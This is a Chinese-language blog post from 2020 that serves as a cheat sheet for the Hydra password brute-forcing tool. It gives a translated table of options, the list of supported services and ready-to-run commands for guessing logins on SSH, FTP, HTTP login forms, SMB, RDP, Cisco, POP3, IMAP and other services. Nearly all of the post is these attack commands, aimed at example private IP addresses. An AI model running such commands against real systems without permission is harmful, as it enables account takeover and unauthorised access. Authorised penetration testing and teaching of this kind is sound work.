密码爆破_hydra

示例

hydra -l 用户名 -P 密码字典 ftp://192.168.0.1

hydra -L 用户字典 -p 密码 imap://192.168.0.1/PLAIN

hydra -C 用户名密码字典 -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

hydra -l 用户名 -p密码 ftp://[192.168.0.0/24]/

hydra -L 用户字典 -P 密码字典 -M 目标字典 ssh

参数说明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

参数 说明
-R 恢复先前中止/崩溃的会话
-I 忽略现有还原文件(不要等待10秒)
-S 执行SSL连接
-s PORT 如果服务在其他默认端口上,请在此处定义它
-l LOGIN or -L FILE 使用登录名登录,或从文件加载多个登录名
-p PASS or -P FILE 尝试密码传递,或从文件加载多个密码
-x MIN:MAX:CHARSET 密码暴力强制生成,键入“-x-h”以获取帮助
-y 禁用bruteforce中的符号使用,见上文
-e nsr 尝试“n”空密码、“s”作为pass登录和/或“r”反向登录
-u 循环用户,而不是密码(有效!x-隐含)
-C FILE 冒号分隔“login:pass”格式,而不是-L/-P选项
-M FILE 要攻击的服务器列表,每行一个条目,“:”指定端口
-o FILE 将找到的登录/密码对写入文件而不是stdout
-b FORMAT 指定-o文件的格式:text(默认)、json、jsonv1
-f / -F 找到登录/通过对时退出(-M:-f每个主机,-f全局)
-t TASKS 运行任务每个目标并行连接数(默认值:16)
-T TASKS 整体并行运行任务连接(对于-M,默认值为64)
-w / -W TIME 每个线程的连接之间的响应(32)/等待时间(0)
-c TIME 所有线程上每次登录尝试的等待时间(强制执行-t1)
-4 / -6 使用IPv4(默认)/IPv6地址(始终放在[]中,也在-M中)
-v / -V / -d 详细模式/显示登录名+每次尝试通过/调试模式
-O 使用旧的SSL v2和v3
-q 不打印有关连接错误的消息
-U 服务模块使用详细信息
-h 更多命令行选项(完整帮助)
server 目标:DNS、IP或192.168.0.0/24(此选项或-M选项)
service 要破解的服务(有关支持的协议,请参见下文)
OPT 某些服务模块支持附加输入(-U表示模块帮助)

支持的服务

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

各种用法实例

源自CSDN

1、破解ssh:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。)

5、破解https:

hydra -l \<用户> -p \<密码> \<IP地址> <头部信息> "\<登录页面>:\<请求正文>:\<错误消息>"

示例:

hydra -V -l admin -P /root/pass.txt 192.168.80.128 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

6、破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

posted @ 2020-08-13 11:03  榕霖  阅读(865)  评论(0编辑  收藏  举报